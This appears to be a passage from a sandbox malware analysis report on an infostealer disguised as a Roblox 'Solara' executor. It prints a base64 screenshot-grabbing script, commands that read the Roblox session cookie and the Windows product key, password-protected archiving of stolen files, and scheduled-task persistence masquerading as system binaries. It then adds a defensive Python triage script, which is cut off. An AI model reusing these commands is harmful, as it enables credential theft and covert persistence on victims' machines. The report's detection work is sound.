gACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiA
G8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=15⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6040 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\k1nire1j\k1nire1j.cmdline"16⤵PID:5304
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7EE4.tmp" "c:\Users\Admin\AppData\Local\Temp\k1nire1j\CSC4FD38EEB3E774408A39043C98DDE533.TMP"17⤵PID:5012
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"14⤵PID:4084
-
C:\Windows\system32\tree.comtree /A /F15⤵PID:2648
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"14⤵PID:3568
-
C:\Windows\system32\attrib.exeattrib -r C:\Windows\System32\drivers\etc\hosts15⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:5928 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"14⤵PID:5640
-
C:\Windows\system32\tree.comtree /A /F15⤵PID:4484
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"14⤵PID:5652
-
C:\Windows\system32\attrib.exeattrib +r C:\Windows\System32\drivers\etc\hosts15⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:5968 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"14⤵PID:5368
-
C:\Windows\system32\tree.comtree /A /F15⤵PID:5920
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"14⤵PID:5728
-
C:\Windows\system32\tasklist.exetasklist /FO LIST15⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5756 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"14⤵PID:6132
-
C:\Windows\system32\tree.comtree /A /F15⤵PID:1124
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"14⤵PID:4976
-
C:\Windows\system32\tree.comtree /A /F15⤵PID:3428
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"14⤵PID:5912
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY15⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5316 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"14⤵PID:1096
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY15⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5348 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"14⤵PID:1504
-
C:\Windows\system32\getmac.exegetmac15⤵PID:1296
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI20922\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\aZ8XX.zip" *"14⤵PID:6104
-
C:\Users\Admin\AppData\Local\Temp\_MEI20922\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI20922\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\aZ8XX.zip" *15⤵
- Executes dropped EXE
PID:1804 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"14⤵PID:4444
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption15⤵
- Suspicious use of AdjustPrivilegeToken
PID:3704 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"14⤵PID:3596
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV115⤵PID:4300
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory15⤵PID:4044
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"14⤵PID:4476
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid15⤵PID:5404
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"14⤵PID:1568
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER15⤵
- Suspicious behavior: EnumeratesProcesses
PID:5244 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"14⤵PID:4184
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name15⤵
- Detects videocard installed
PID:5984 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"14⤵PID:4056
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault15⤵
- Suspicious behavior: EnumeratesProcesses
PID:3168 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\Built.exe""14⤵PID:3752
-
C:\Windows\system32\PING.EXEping localhost -n 315⤵
- Runs ping.exe
PID:5828 -
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"12⤵
- Blocklisted process makes network request
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4976 -
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe"C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe"13⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4028 -
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe" --embedded-browser-webview=1 --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --noerrdialogs --embedded-browser-webview-dpi-awareness=1 --enable-features=MojoIpcz --mojo-named-platform-channel-pipe=4028.1440.776500408270139430114⤵
- Drops file in Program Files directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:2776 -
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Crashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=125.0.6422.142 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe" --annotation=plat=Win64 "--annotation=prod=Edge WebView2" --annotation=ver=125.0.2535.92 --initial-client-data=0x15c,0x160,0x164,0x138,0x16c,0x7ffed9054ef8,0x7ffed9054f04,0x7ffed9054f1015⤵PID:508
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe" --type=gpu-process --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1716,i,16939575836588964267,14978393057242945908,262144 --enable-features=MojoIpcz --variations-seed-version --mojo-platform-channel-handle=1672 /prefetch:215⤵PID:5312
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --field-trial-handle=1872,i,16939575836588964267,14978393057242945908,262144 --enable-features=MojoIpcz --variations-seed-version --mojo-platform-channel-handle=1996 /prefetch:315⤵PID:4780
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --field-trial-handle=1980,i,16939575836588964267,14978393057242945908,262144 --enable-features=MojoIpcz --variations-seed-version --mojo-platform-channel-handle=2252 /prefetch:815⤵PID:5180
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc --ms-user-locale=" --field-trial-handle=3480,i,16939575836588964267,14978393057242945908,262144 --enable-features=MojoIpcz --variations-seed-version --mojo-platform-channel-handle=3492 /prefetch:115⤵PID:5484
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --field-trial-handle=2176,i,16939575836588964267,14978393057242945908,262144 --enable-features=MojoIpcz --variations-seed-version --mojo-platform-channel-handle=2060 /prefetch:815⤵PID:5124
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --field-trial-handle=752,i,16939575836588964267,14978393057242945908,262144 --enable-features=MojoIpcz --variations-seed-version --mojo-platform-channel-handle=4728 /prefetch:815⤵PID:1724
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4784,i,16939575836588964267,14978393057242945908,262144 --enable-features=MojoIpcz --variations-seed-version --mojo-platform-channel-handle=4620 /prefetch:8
15⤵
PID:2212
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --field-trial-handle=4796,i,16939575836588964267,14978393057242945908,262144 --enable-features=MojoIpcz --variations-seed-version --mojo-platform-channel-handle=4824 /prefetch:8
15⤵
PID:3924
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\agentInto\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5996
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\agentInto\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5748
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\agentInto\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4772
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Photo Viewer\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4808
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5464
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Photo Viewer\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5576
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 10 /tr "'C:\Users\Admin\AppData\Local\Application Data\cmd.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5580
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Application Data\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2000
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 10 /tr "'C:\Users\Admin\AppData\Local\Application Data\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5924
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 11 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\System.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5428
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office 15\ClientX64\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5224
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 5 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4132
-
C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:5368
-
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:3408
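The twelve schtasks.exe /create invocations in the process list above are the sample's scheduled-task persistence: each target binary gets a MINUTE-interval relaunch task plus an ONLOGON task with /rl HIGHEST, and every task name is the executable name with at most one extra letter. The Python below is an added triage example, not part of the original report or of the sandbox's own tooling: it parses such command lines and flags the traits an analyst would pick out (a Windows binary name such as conhost.exe or cmd.exe launched from outside System32, a System.exe that has no legitimate on-disk counterpart, targets under AppData or Temp, a task name mirroring the executable, short MINUTE intervals, and ONLOGON with HIGHEST). The allow-list of system directories, the user-writable markers and the 15-minute threshold are assumptions of the example; the sample command lines are copied from the process list above.

```python
import ntpath
from dataclasses import dataclass, field
from typing import List, Optional

# Assumed allow-list of where these Windows binaries legitimately live on disk.
# An empty tuple means the name never belongs on disk: the "System" process is the
# kernel pseudo-process and has no System.exe image, so any System.exe is a fake.
KNOWN_WINDOWS_BINARIES = {
    "conhost.exe": (r"c:\windows\system32", r"c:\windows\syswow64"),
    "cmd.exe": (r"c:\windows\system32", r"c:\windows\syswow64"),
    "system.exe": (),
}
# Assumed markers for user-writable locations a scheduled task should rarely launch from.
USER_WRITABLE_MARKERS = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\")
VALUELESS_SWITCHES = {"/f", "/z", "/it", "/np"}  # schtasks switches that take no argument
WATCHDOG_MINUTES = 15  # assumed threshold: intervals at or below this look like a relaunch watchdog


def split_windows_args(cmd: str) -> List[str]:
    """Split on whitespace while honouring double quotes; backslashes stay literal
    (shlex.split would treat them as escapes and mangle Windows paths)."""
    args, buf, in_quotes = [], [], False
    for ch in cmd:
        if ch == '"':
            in_quotes = not in_quotes
        elif ch.isspace() and not in_quotes:
            if buf:
                args.append("".join(buf))
                buf = []
        else:
            buf.append(ch)
    if buf:
        args.append("".join(buf))
    return args


@dataclass
class TaskCreate:
    name: str                # /tn
    schedule: str            # /sc, upper-cased (MINUTE, ONLOGON, ...)
    modifier: Optional[int]  # /mo, the interval for MINUTE schedules
    run_level: str           # /rl, upper-cased ("" when absent)
    target: str              # /tr with the report's surrounding '...' removed
    findings: List[str] = field(default_factory=list)


def parse_schtasks_create(cmd: str) -> Optional[TaskCreate]:
    """Return a TaskCreate for 'schtasks.exe /create ...' lines, None for anything else."""
    args = split_windows_args(cmd)
    if len(args) < 2 or ntpath.basename(args[0]).lower() != "schtasks.exe":
        return None
    if args[1].lower() != "/create":
        return None
    opts, i = {}, 2
    while i < len(args):
        key = args[i].lower()
        if key in VALUELESS_SWITCHES or i + 1 >= len(args) or args[i + 1].startswith("/"):
            opts[key], i = "", i + 1
        else:
            opts[key], i = args[i + 1], i + 2
    mo = opts.get("/mo", "")
    return TaskCreate(
        name=opts.get("/tn", ""),
        schedule=opts.get("/sc", "").upper(),
        modifier=int(mo) if mo.isdigit() else None,
        run_level=opts.get("/rl", "").upper(),
        target=opts.get("/tr", "").strip("'"),
    )


def analyze(task: TaskCreate) -> TaskCreate:
    """Attach the findings a triage analyst would raise for this task definition."""
    exe = ntpath.basename(task.target).lower()
    directory = ntpath.dirname(task.target).lower()
    allowed = KNOWN_WINDOWS_BINARIES.get(exe)
    if allowed is not None and directory not in allowed:
        task.findings.append(f"masquerade: {exe} launched from {task.target}")
    if any(m in directory + "\\" for m in USER_WRITABLE_MARKERS):
        task.findings.append("target in a user-writable location")
    stem = exe[:-4] if exe.endswith(".exe") else exe
    if stem and task.name.lower().startswith(stem) and len(task.name) - len(stem) <= 1:
        task.findings.append(f"task name {task.name!r} mirrors the executable name (weak signal)")
    if task.schedule == "MINUTE" and task.modifier is not None and task.modifier <= WATCHDOG_MINUTES:
        task.findings.append(f"relaunch every {task.modifier} min (watchdog pattern)")
    if task.schedule == "ONLOGON" and task.run_level == "HIGHEST":
        task.findings.append("elevated run at every logon")
    return task


def scan(lines) -> List[TaskCreate]:
    """Parse and analyse every schtasks /create line; non-matching lines are skipped."""
    return [analyze(t) for t in map(parse_schtasks_create, lines) if t is not None]


# Constructed input: the twelve command lines from the process list above.
SAMPLE_COMMAND_LINES = [
    r'''schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\agentInto\conhost.exe'" /f''',
    r'''schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\agentInto\conhost.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\agentInto\conhost.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Photo Viewer\conhost.exe'" /f''',
    r'''schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\conhost.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Photo Viewer\conhost.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 10 /tr "'C:\Users\Admin\AppData\Local\Application Data\cmd.exe'" /f''',
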